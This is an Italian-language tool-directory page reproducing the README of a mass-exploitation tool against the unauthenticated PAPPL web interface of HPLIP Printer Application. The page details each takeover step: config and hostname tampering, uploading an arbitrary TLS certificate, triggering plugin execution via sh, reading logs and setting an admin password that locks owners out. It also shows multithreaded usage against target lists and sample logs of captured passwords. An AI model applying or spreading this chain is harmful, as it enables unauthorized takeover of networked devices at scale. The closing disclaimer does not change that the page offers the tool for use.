Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-91097-CVE-2026-91106 — HPLIP < 3.26.6 — Acquisizione completa dell'accesso amministrativo tramite l'interfaccia web PAPPL (nessuna autenticazione). Correlato a CVE-2026-91097 fino a CVE-2026-91106 (CVSS 9.3) | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2026-91097-cve-2026-91106
Strumenti DifensiviScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPost-ExploitSicurezza WebSicurezza di RetePenetration Testing

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Sviluppo Payload
GitHubnxploited/cve-2026-91097-cve-2026-91106

CVE-2026-91097-CVE-2026-91106

HPLIP < 3.26.6 — Acquisizione completa dell'accesso amministrativo tramite l'interfaccia web PAPPL (nessuna autenticazione). Correlato a CVE-2026-91097 fino a CVE-2026-91106 (CVSS 9.3)

Vedi Repository
42 giorni faNon ancora revisionato
Condividi

Affected Auth Impact

🔬 Unisciti a Telegram per le ultime ricerche sulle vulnerabilità e i rilasci di exploit
Telegram


HPLIP Printer Application — Acquisizione Admin Non Autenticata

Strumento di sfruttamento di massa che prende di mira la HPLIP Printer Application (interfaccia web basata su PAPPL) in tutte le versioni di HPLIP precedenti alla 3.26.6. Lo strumento sfrutta lo stato predefinito non autenticato dell'interfaccia web PAPPL per eseguire una catena completa di acquisizione amministrativa: manomissione della configurazione, modifica dell'hostname, sostituzione del certificato TLS, installazione del plugin HP (che attiva l'esecuzione shell del file .run sul target), esfiltrazione dei log di sistema e blocco della password admin.

Cosa Sfrutta Questo Strumento

La vulnerabilità principale è l'Accesso Amministrativo Non Autenticato di PAPPL — la HPLIP Printer Application viene fornita con nessuna password configurata per impostazione predefinita, consentendo a qualsiasi attaccante di rete di eseguire tutte le azioni amministrative senza autenticazione tramite l'interfaccia web (tipicamente la porta 8000).

Inoltre, la catena di installazione del plugin sfrutta debolezze affrontate in:

CVECWECVSS 4.0Rilevanza
CVE-2026-91097CWE-94 / CWE-7877.0Path Traversal in plugin.spec — l'installazione del plugin attivata da questo strumento passa attraverso il codice vulnerabile di pluginhandler.py
CVE-2026-91102CWE-78 / CWE-4948.4Download Senza Verifica di Integrità — il file .run del plugin viene scaricato via HTTP ed eseguito con sh sul target

HP Security Bulletin: HPSBPI04151

Endpoint Sfruttati

EndpointAzioneVerificato
/securityImposta la password admin (acquisizione account)✅
/configModifica nome DNS-SD, posizione, organizzazione, contatto✅
/networkCambia l'hostname di sistema✅
/tls-install-crtCarica certificato TLS arbitrario + chiave privata✅
/pluginAttiva il download del plugin HP + accettazione licenza + installazione (esegue .run con sh)✅
/logfile.txtLegge il file di log completo dell'applicazione (divulgazione di informazioni)✅

Catena di Sfruttamento

root@kitploit:~
Target Discovery
    │
    ▼
Detect HPLIP Printer Application (Server header + version)
    │
    ▼
Check Authentication Status (/security)
    │
    ├── Password Set ──► Log as VULN (locked)
    │
    └── No Password (default) ──► Exploit Chain:
            │
            ├── 1. Modify Configuration (/config)
            │       dns_sd_name, location, organization, contact_name
            │       Verified: marker reflected in response
            │
            ├── 2. Change Hostname (/network)
            │       Old hostname captured, new hostname set
            │       Verified: new value reflected in response
            │
            ├── 3. Upload TLS Certificate (/tls-install-crt)
            │       Custom PEM certificate + private key
            │       Multipart file upload
            │
            ├── 4. Install HP Plugin (/plugin)
            │       Step 1: POST action=install-plugin (downloads .run)
            │       Step 2: POST action=license-accepted (executes with sh)
            │       ⚠ CVE-2026-91097 + CVE-2026-91102
            │
            ├── 5. Read Log File (/logfile.txt)
            │       System paths, environment info, Snap paths
            │
            └── 6. Set Admin Password (/security)
                    Locks out further unauthenticated access
                    Completes full admin takeover

Installazione

root@kitploit:~
pip install requests

Richiesto Python 3.8+. Nessun'altra dipendenza.

Utilizzo

Riga di Comando

root@kitploit:~
python T.py targets.txt 50
ArgomentoDescrizionePredefinito
targets.txtFile contenente la lista dei target (uno per riga)Richiesto
50Numero di thread concorrenti15

Modalità Interattiva

root@kitploit:~
python T.py

Lo strumento richiederà il file della lista dei target e il numero di thread.

Formato del Target

root@kitploit:~
192.168.1.100:8000
https://10.0.0.1:8000
http://printer.local:8000
192.168.1.100
printer.example.com
  • Se non viene specificata una porta, il valore predefinito è 8000
  • Se non viene specificato uno schema, vengono provati sia HTTP che HTTPS
  • I target duplicati vengono automaticamente deduplicati
  • Le righe che iniziano con # vengono ignorate

File di Output

FileContenuto
AdminS.txtAcquisizione admin — password, versione del server, mappa completa degli URL del pannello
Nx_modify.txtModifiche verificate di configurazione e hostname (valori vecchi → nuovi)
Nx_upload.txtConferme di caricamento del certificato TLS
Nx_plugin.txtRisultati dell'installazione del plugin HP con stato di esecuzione shell
Nx_recon.txtDivulgazione di informazioni — dimensione del file di log, percorsi d'ambiente, versione

Esempio — AdminS.txt

root@kitploit:~
http://192.168.1.100:8000 | v3.22.10 | password=Nx-zD_buovl6wko0 | server=HPLIP_Printer_Application/3.22.10-13 PAPPL/1.4.9 | panel=http://192.168.1.100:8000/ | security=http://192.168.1.100:8000/security | config=http://192.168.1.100:8000/config | ...

Esempio — Nx_modify.txt

root@kitploit:~
http://192.168.1.100:8000/config | v3.22.10 | type=CONFIG | verified=true | dns_sd_name: 'HPLIP Printer Application' -> 'HPLIP [marker]' | location: '' -> 'Nxploited-marker'
http://192.168.1.100:8000/network | v3.22.10 | type=HOSTNAME | verified=true | old=ORIGINAL-HOST.local | new=nx-abc123

Output della Console

root@kitploit:~
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

   ██████   ██ ██   ██
   ██  ███  ██  ██ ██
   ██   ██████   ███
   ██    █████  ██ ██
   ██     ████ ██   ██

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  HPLIP Printer Application  │  Admin Takeover + Full Control
  Affected < 3.26.6  │  PAPPL Unauthenticated Access

  CVE-2026-91097  │  Plugin Path Traversal
  CVE-2026-91102  │  Plugin Download Without Integrity + Shell Exec

  Exploited via Web:  /security /config /network /plugin /tls-install-crt /logs

  By: Nxploited ( Khaled Alenazi )  │  Telegram: @Kxploit
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

 targets=4  threads=4

 00:11:34  [CUPS  ]  http://192.168.1.100:8000  Server: HPLIP_Printer_Application/3.22.10-13
 00:11:34  [VER   ]  http://192.168.1.100:8000  v3.22.10 < 3.26.6 AFFECTED
 00:11:35  [PROBE ]  http://192.168.1.100:8000  v3.22.10 | NO AUTH | exploiting...
 00:11:36  [CFG   ]  http://192.168.1.100:8000  CONFIG MODIFIED | marker=abc12345
 00:11:37  [NET   ]  http://192.168.1.100:8000  HOSTNAME 'OLD-HOST.local' -> 'nx-xyz789'
 00:11:38  [CERT  ]  http://192.168.1.100:8000  TLS CERT UPLOADED | marker=abc12345
 00:12:03  [PLG   ]  http://192.168.1.100:8000  PLUGIN | freshly_installed | shell_exec=True
 00:12:05  [LOG   ]  http://192.168.1.100:8000  logfile.txt | 19083B | env=/var/snap/hplip-printer-app/
 00:12:05  [ADMIN ]  http://192.168.1.100:8000  PASSWORD SET | pw=Nx-zD_buovl6wko0
 00:12:05  [HIT   ]  http://192.168.1.100:8000  v3.22.10 + CONFIG + HOSTNAME + CERT + PLUGIN + LOGS + ADMIN

 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 DONE  4/4  █ HIT=4  █ VULN=0  █ SAFE=0  █ SKIP=0

 ▐ Admin Takeover: 4  └─ AdminS.txt
 ▐ Modifications : 8  └─ Nx_modify.txt
 ▐ Cert Uploads  : 4  └─ Nx_upload.txt
 ▐ Plugin Exec   : 1  └─ Nx_plugin.txt
 ▐ Recon / Info  : 8  └─ Nx_recon.txt
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Classificazione dei Target

TagSignificato
HITSfruttato con successo — acquisizione admin ottenuta
VULNVulnerabile ma password già impostata (bloccato)
SAFEVersione ≥ 3.26.6 (corretta)
SKIPNon è una HPLIP Printer Application o non raggiungibile

Note Tecniche

  • La HPLIP Printer Application viene eseguita come pacchetto Snap su sistemi basati su Ubuntu, con i dati memorizzati in /var/snap/hplip-printer-app/common/
  • Il framework PAPPL utilizza GnuTLS per le operazioni TLS (API C, non comandi shell) — il caricamento del certificato TLS scrive su disco ma non attiva l'esecuzione di codice
  • L'installazione del plugin attiva sh plugin.run --keep --nox11 che esegue il binario ufficiale del plugin HP — il contenuto viene scaricato dai server HP; l'attaccante non controlla il contenuto del plugin ma ne attiva l'esecuzione
  • Lo strumento imposta una password univoca per ogni target per prevenire un nuovo sfruttamento e registra le credenziali per la verifica
  • Ogni modifica di configurazione utilizza un marker casuale verificato nella risposta del server per confermare che la modifica sia stata applicata
  • Nessun RCE arbitrario — lo strumento non carica web shell né inietta comandi arbitrari; le azioni sfruttabili sono l'acquisizione admin, la manomissione della configurazione, la sostituzione del certificato, l'esecuzione del plugin HP e la divulgazione di informazioni

Riferimenti

  • HP Security Bulletin HPSBPI04151
  • NVD — CVE-2026-91097
  • NVD — CVE-2026-91102
  • HPLIP Release Notes
  • PAPPL Framework

By: Nxploited


⚠️ Disclaimer

Questo strumento è fornito esclusivamente per ricerca di sicurezza autorizzata, penetration testing e scopi educativi. L'uso di questo strumento contro sistemi senza esplicita autorizzazione scritta dal proprietario del sistema è illegale e non etico. L'autore non si assume alcuna responsabilità per qualsiasi uso improprio, danno o conseguenza legale derivante dall'uso di questo strumento. Ottenere sempre l'autorizzazione appropriata prima di condurre qualsiasi valutazione di sicurezza. Utilizzando questo strumento, accetti di essere l'unico responsabile delle tue azioni e della conformità a tutte le leggi e i regolamenti applicabili.

Scarica lo strumento